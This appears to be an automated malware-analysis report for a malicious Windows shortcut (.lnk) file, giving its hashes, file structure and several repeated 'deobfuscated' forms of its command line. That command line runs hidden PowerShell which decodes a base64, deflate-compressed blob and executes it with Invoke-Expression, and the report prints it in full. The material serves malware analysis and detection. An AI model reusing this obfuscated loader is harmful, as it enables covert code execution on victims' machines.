Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
340a28c94906fb2c40fd066ea1660669
Sha1
6d00fd48542dbc40ffa0aeba2df5e0f8358dbaec
Sha256
0e032aa835a6e356c9a628bf52179b8bc551cca431b1d464d6f600bb8d6c0cad
Sha384
cd375c4562f23ff6e2fdd3a1e524c15a133c2b4957ea9110e0ac5a1a12c0cb12509121bbf6d37fe9d6dd707df2666c3a
Sha512
676a2bcc2aa41537a3dd5a0b831ffcf613c1f6a56208a1caa7bad7681c54b61dfa7e1ea5e83d8ced8e5dc0c4bc62e1d1a6ecb849dc6a74bb59650b0252d44145
SSDeep
24:9BnBUY8E4ZRZspy78uui2Ln81woT7Dyb0+KEqe7ENr/InBHABUgegUHY1a:9xO3EEsp2Yi2L8iTr7kr+BgOgegUH5
TLSH
E8210B715338150BD53742FD6B615D805D1F1015A5F00CF960B55C810B99767157393C
File Structure
340a28c94906fb2c40fd066ea1660669
Malicious
30fdcd36-6cd2-7972.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c powershell -w hidden -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"
Deobfuscated PowerShell

powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@([Convert]::"FromBase64String"($zlfai))) $smwqigj = New-Object "IO.Compression.DeflateStream" (@($czayo, [CompressionMode]::"Decompress")) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()
Deobfuscated PowerShell

powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@({ [Convert]::"FromBase64String"($zlfai) } )) $smwqigj = New-Object "IO.Compression.DeflateStream" (@({ @($czayo, [CompressionMode]::"Decompress") } )) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" [Convert]::"FromBase64String"($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()
340a28c94906fb2c40fd066ea1660669 (1.41 KB)
File Structure
340a28c94906fb2c40fd066ea1660669
Malicious
30fdcd36-6cd2-7972.lnk
Malicious
LNK CommandLine
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /c powershell -w hidden -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk
Deobfuscated PowerShell

powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@([Convert]::"FromBase64String"($zlfai))) $smwqigj = New-Object "IO.Compression.DeflateStream" (@($czayo, [CompressionMode]::"Decompress")) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell

powershell -w "hidden" -c "$zlfai='FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A';$czayo=New-Object IO.MemoryStream(,[Convert]::FromBase64String($zlfai));$smwqigj=New-Object IO.Compression.DeflateStream($czayo,[IO.Compression.CompressionMode]::Decompress);$zhafqtd=New-Object IO.StreamReader($smwqigj);iex $zhafqtd.ReadToEnd()"

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [Deobfuscated PS]
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" (@({ [Convert]::"FromBase64String"($zlfai) } )) $smwqigj = New-Object "IO.Compression.DeflateStream" (@({ @($czayo, [CompressionMode]::"Decompress") } )) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS]
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" [Convert]::"FromBase64String"($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS]
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS]
Deobfuscated PowerShell

$zlfai = "FYw9C8IwFAD/SikBdWgLDg4NIrV+UKhaRHHJEpKnTUmT2PfUxR9v3e7gODYs90DJWTrte87CMmbg3nl9Kou6aJpNcSnEwajBo7+TuJkx+6CojkClVC2IaivYkLYkYz6tbudo0hIFzLPs2b206kClgMpbqcFo43uJqXfWOMhWi0mUXBHWEo1q5IDGPWZp6R2Bo+/pRcnOWIhY4D2O+z+gBQjRnGuwo/4A" $czayo = New-Object "IO.MemoryStream" "[Convert]::FromBase64String" ($zlfai) $smwqigj = New-Object "IO.Compression.DeflateStream" @({ @($czayo, [CompressionMode]::"Decompress") } ) $zhafqtd = New-Object "IO.StreamReader" ($smwqigj) Invoke-Expression $zhafqtd."ReadToEnd"()

Malicious

340a28c94906fb2c40fd066ea1660669 > 30fdcd36-6cd2-7972.lnk > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙